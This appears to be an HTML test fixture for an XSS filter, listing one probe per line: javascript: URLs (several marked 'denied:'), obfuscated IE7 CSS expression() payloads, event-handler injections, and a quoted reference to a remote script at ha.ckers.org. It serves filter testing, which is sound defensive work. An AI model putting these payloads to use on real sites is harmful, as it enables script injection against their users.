<!--
  XSS filter test fixture, one probe per line.
  NOTE(review): the "denied:" prefix on several URL values below looks like the
  filter's marker for a rejected scheme, which would make this the expected
  sanitized output rather than raw input; confirm against the test harness.
  The "Bad IE7", "Opera" and "Bad in PHP version without safe" labels are part
  of the fixture text itself.
  In the first probe the event-handler text sits inside the quoted alt value,
  so it is attribute data rather than a second tag.
-->
<img alt="<img onmouseover=confirm(1)//" src="src" />
'';!--"=&{()}<br />
<img src="denied:javascript%3Aalert('xss');" alt="image" /><br />
<img src="denied:javascript:alert('xss');" alt="image" /><br />
<img src="denied:java script:alert('xss');" alt="image" /><br />
<img src="denied:javascript:alert('XSS')" alt="image" /><br />
<span style="color: #FF6699'onmouseover='alert(1)//;">test</span>
<span style="color: img//onerror='alert`www.ptsecurity.com`'src=Psych0tr1a;">
<br />
<br />
<br />
<!--[if gte IE 4]>alert('xss');<![endif]--><br />
" src="http://ha.ckers.org/xss.js"><br />
<strong>Bad in PHP version without safe:</strong> " ";alert(window.location.href);//><br />
<br />
<!-- The style value still names -moz-binding, but its url() target carries the "denied:" prefix, so the http URL is no longer usable as written; the href is left as is. -->
<a style=";-moz-binding:url(denied:http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
<!-- The double quote and equals sign in the href stay percent-encoded (%22, %3d), so the trailing style text remains part of the URL value instead of becoming a style attribute. -->
<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert %28%27xss%3f%29%29">x</a><br />
<strong>Opera:</strong> <a href="denied:\xE2\x80\x83javascript:alert(123)">link</a>
<strong>Bad IE7:</strong> <a style="color:expr comment*/ession(alert(document.domain))">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: x */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="x" style="width: *** *;;;;;;*/ */(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background: */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background: huh */ */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background: */ (alert('xss'));background: */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> exp/*<a style="no ss:noxss("*/ ");xss:ex XSS*/ /pression(alert("XSS"))">x</a><br />
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="color: 065 078 070 072 065 073 073 069 06f 06e 028 061 06c 065 072 074 028 031 029 029">test</a><br />
<strong>Bad IE7:</strong> <a style="xss:e #48;078pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:url('denied:java script:eval(document.all.mycode.expr)')">hi</a><br />
</span> |